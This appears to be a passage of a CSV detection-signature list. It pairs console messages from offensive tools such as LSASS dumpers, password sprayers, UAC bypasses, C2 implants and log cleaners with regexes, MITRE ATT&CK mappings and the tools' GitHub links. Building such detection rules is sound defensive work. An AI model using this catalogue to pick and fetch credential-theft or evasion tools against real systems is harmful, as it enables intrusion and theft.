CredBackupCredentials(*",".{0,1000}\[!\]\sCredBackupCredentials\(.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","9","1","51","6","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z" "*[!] Dumping LSASS Requires Elevated Priviledges!*",".{0,1000}\[!\]\sDumping\sLSASS\sRequires\sElevated\sPriviledges!.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option*",".{0,1000}\[!\]\sDumping\sthe\sntds\scan\scrash\sthe\sDC\son\sWindows\sServer\s2019\.\sUse\sthe\soption.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*[!] Dynamic Sink: BAD"", L""Harness""*",".{0,1000}\[!\]\sDynamic\sSink\:\sBAD\"",\sL\""Harness\"".{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*[!] Elevated process spawned!*",".{0,1000}\[!\]\sElevated\sprocess\sspawned!.{0,1000}","offensive_tool_keyword","Elevator","UAC bypass by abusing RPC and debug objects.","T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Kudaes/Elevator","1","0","N/A","10","6","589","68","2023-10-19T08:51:09Z","2022-08-25T21:39:28Z" "*[!] ESTSAUTHPERSISTENT cookie was empty!*",".{0,1000}\[!\]\sESTSAUTHPERSISTENT\scookie\swas\sempty!.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*[!] Failed to Create Process to Dump SAM*",".{0,1000}\[!\]\sFailed\sto\sCreate\sProcess\sto\sDump\sSAM.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*[!] Failed to delete Performance registry key.*",".{0,1000}\[!\]\sFailed\sto\sdelete\sPerformance\sregistry\skey\..{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","#contentstrings","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*[!] Failed to download legitimate GPO from SYSVOL (dc_ip:*",".{0,1000}\[!\]\sFailed\sto\sdownload\slegitimate\sGPO\sfrom\sSYSVOL\s\(dc_ip\:.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*[!] Failed to enumerate ADCS data.*",".{0,1000}\[!\]\sFailed\sto\senumerate\sADCS\sdata\..{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*[!] Failed to exfiltrate using RoadTools auth file*",".{0,1000}\[!\]\sFailed\sto\sexfiltrate\susing\sRoadTools\sauth\sfile.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*[!] Failed to fake NtOpenProcess on LSASS PID*",".{0,1000}\[!\]\sFailed\sto\sfake\sNtOpenProcess\son\sLSASS\sPID.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*[!] Failed to get LSASS handle, bailing!*",".{0,1000}\[!\]\sFailed\sto\sget\sLSASS\shandle,\sbailing!.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*[!] Failed to Kill EventLog Service*",".{0,1000}\[!\]\sFailed\sto\sKill\sEventLog\sService.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","10","5","452","69","2024-04-19T20:15:04Z","2023-07-24T13:59:16Z" "*[!] Failed to load shellcode into memory*",".{0,1000}\[!\]\sFailed\sto\sload\sshellcode\sinto\smemory.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","N/A","10","10","53","6","2024-04-11T13:10:32Z","2024-04-11T12:17:22Z" "*[!] Failed to parse RoadTools auth JSON file*",".{0,1000}\[!\]\sFailed\sto\sparse\sRoadTools\sauth\sJSON\sfile.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*[!] Failed to Transfer LSASS Dump*",".{0,1000}\[!\]\sFailed\sto\sTransfer\sLSASS\sDump.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*[!] Failed to write malicious scheduled task to downloaded GPO. Exiting*",".{0,1000}\[!\]\sFailed\sto\swrite\smalicious\sscheduled\stask\sto\sdownloaded\sGPO\.\sExiting.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*[!] Feature is unsupported for PS1 rats*",".{0,1000}\[!\]\sFeature\sis\sunsupported\sfor\sPS1\srats.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*[!] Found exploitable sgid binary*",".{0,1000}\[!\]\sFound\sexploitable\ssgid\sbinary.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*[!] Found exploitable Sudo NOPASSWD binary*",".{0,1000}\[!\]\sFound\sexploitable\sSudo\sNOPASSWD\sbinary.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*[!] Found exploitable suid binary*",".{0,1000}\[!\]\sFound\sexploitable\ssuid\sbinary.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*[!] HTTP reflected DCOM authentication failed *",".{0,1000}\[!\]\sHTTP\sreflected\sDCOM\sauthentication\sfailed\s.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*[!] inject dll into log process failure *",".{0,1000}\[!\]\sinject\sdll\sinto\slog\sprocess\sfailure\s.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*[!] Insecure resource delegations found. Exporting report:*",".{0,1000}\[!\]\sInsecure\sresource\sdelegations\sfound\.\sExporting\sreport\:.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*[!] Insecure trustee delegations found. Exporting report: *",".{0,1000}\[!\]\sInsecure\strustee\sdelegations\sfound\.\sExporting\sreport\:\s.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*[!] Invalid Exfil Method Chosen! Data Will Not Be Sent!*",".{0,1000}\[!\]\sInvalid\sExfil\sMethod\sChosen!\sData\sWill\sNot\sBe\sSent!.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*[!] Invalid sandbox evasion technique provided!*",".{0,1000}\[!\]\sInvalid\ssandbox\sevasion\stechnique\sprovided!.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*[!] Invalid sandbox evasion technique provided!*",".{0,1000}\[!\]\sInvalid\ssandbox\sevasion\stechnique\sprovided!.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","print output","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*[!] It was not possible to retrieve GPO Policies*",".{0,1000}\[!\]\sIt\swas\snot\spossible\sto\sretrieve\sGPO\sPolicies.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*[!] Looks like Victim * doesn't have office365 Licence!*",".{0,1000}\[!\]\sLooks\slike\sVictim\s.{0,1000}\sdoesn\'t\shave\soffice365\sLicence!.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "*[!] Modifialbe scheduled tasks were not evaluated due to permissions*",".{0,1000}\[!\]\sModifialbe\sscheduled\stasks\swere\snot\sevaluated\sdue\sto\spermissions.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*[!] Nim and C# are the only language capable of executing BOFS*",".{0,1000}\[!\]\sNim\sand\sC\#\sare\sthe\sonly\slanguage\scapable\sof\sexecuting\sBOFS.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*[!] Password spraying will be conducted*",".{0,1000}\[!\]\sPassword\sspraying\swill\sbe\sconducted.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","0","N/A","10","1","60","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z" "*[!] PRESS TO EXECUTE SHELLCODED EXE*",".{0,1000}\[!\]\sPRESS\sTO\sEXECUTE\sSHELLCODED\sEXE.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*[!] Rasman service is not running!*",".{0,1000}\[!\]\sRasman\sservice\sis\snot\srunning!.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*[!] Shellcoded PE\'s size: *",".{0,1000}\[!\]\sShellcoded\sPE\\\'s\ssize\:\s.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*[!] SMB reflected DCOM authentication failed*",".{0,1000}\[!\]\sSMB\sreflected\sDCOM\sauthentication\sfailed.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*[!] Stealing processes delayed with *",".{0,1000}\[!\]\sStealing\sprocesses\sdelayed\swith\s.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "*[!] Swithed to custom stealing. *",".{0,1000}\[!\]\sSwithed\sto\scustom\sstealing\.\s.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "*[!] The exfiltration modules does not use FireProx*",".{0,1000}\[!\]\sThe\sexfiltration\smodules\sdoes\snot\suse\sFireProx.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*[!] The password * will be sprayed on targeted user accounts having*",".{0,1000}\[!\]\sThe\spassword\s.{0,1000}\swill\sbe\ssprayed\son\stargeted\suser\saccounts\shaving.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","0","N/A","10","1","60","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z" "*[!] Unable to read PEB address!*",".{0,1000}\[!\]\sUnable\sto\sread\sPEB\saddress!.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","0","#contentstrings","9","1","96","16","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z" "*[!] Unhandled SharpDoor exception*",".{0,1000}\[!\]\sUnhandled\sSharpDoor\sexception.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","9","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*[!] Valid login* expired password: *",".{0,1000}\[!\]\sValid\slogin.{0,1000}\sexpired\spassword\:\s.{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090","TA0006 - TA0005 - TA0001","N/A","N/A","Credential Access","https://github.com/nickzer0/RagingRotator","1","0","N/A","10","1","74","5","2024-02-05T21:46:54Z","2023-09-01T15:19:38Z" "*[!] You are running TeamFiltration without a config*",".{0,1000}\[!\]\sYou\sare\srunning\sTeamFiltration\swithout\sa\sconfig.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*[!] You have DCs with RC4 or DES allowed for Kerberos!!!*",".{0,1000}\[!\]\sYou\shave\sDCs\swith\sRC4\sor\sDES\sallowed\sfor\sKerberos!!!.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*[!][!][!] Checking Directories [!][!][!]*",".{0,1000}\[!\]\[!\]\[!\]\sChecking\sDirectories\s\[!\]\[!\]\[!\].{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*[!][!][!] Checking drivers [!][!][!]*",".{0,1000}\[!\]\[!\]\[!\]\sChecking\sdrivers\s\[!\]\[!\]\[!\].{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*[!][!][!] Checking modules loaded in your current process [!][!][!]*",".{0,1000}\[!\]\[!\]\[!\]\sChecking\smodules\sloaded\sin\syour\scurrent\sprocess\s\[!\]\[!\]\[!\].{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*[!][!][!] Checking Services [!][!][!]*",".{0,1000}\[!\]\[!\]\[!\]\sChecking\sServices\s\[!\]\[!\]\[!\].{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*[!][!][!] EDR Checks Complete [!][!][!]*",".{0,1000}\[!\]\[!\]\[!\]\sEDR\sChecks\sComplete\s\[!\]\[!\]\[!\].{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*[!][!][!] Welcome to SharpEDRChecker by @PwnDexter [!][!][!]*",".{0,1000}\[!\]\[!\]\[!\]\sWelcome\sto\sSharpEDRChecker\sby\s\@PwnDexter\s\[!\]\[!\]\[!\].{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*[#] [HELL HALL] Press To QUIT ... *",".{0,1000}\[\#\]\s\[HELL\sHALL\]\sPress\s\\sTo\sQUIT\s\.\.\.\s.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","N/A","8","5","413","61","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z" "*[#] Checking file against AMSI Trigger*",".{0,1000}\[\#\]\sChecking\sfile\sagainst\sAMSI\sTrigger.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*[#] Ready For ETW Patch.*",".{0,1000}\[\#\]\sReady\sFor\sETW\sPatch\..{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","81","12","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*[#] Shellcode located at address *",".{0,1000}\[\#\]\sShellcode\slocated\sat\saddress\s.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*[*] Appending access tokens to access_tokens.txt*",".{0,1000}\[.{0,1000}\]\sAppending\saccess\stokens\sto\saccess_tokens\.txt.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","#contentstrings","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*[*] Checking access to mailboxes for each email address?*",".{0,1000}\[.{0,1000}\]\sChecking\saccess\sto\smailboxes\sfor\seach\semail\saddress\?.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","#contentstrings","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*[*] Downloading the legitimate GPO from SYSVOL*",".{0,1000}\[.{0,1000}\]\sDownloading\sthe\slegitimate\sGPO\sfrom\sSYSVOL.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*[*] Injecting malicious scheduled task into downloaded GPO*",".{0,1000}\[.{0,1000}\]\sInjecting\smalicious\sscheduled\stask\sinto\sdownloaded\sGPO.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*[*] Overall compromised accounts: *",".{0,1000}\[.{0,1000}\]\sOverall\scompromised\saccounts\:\s.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential 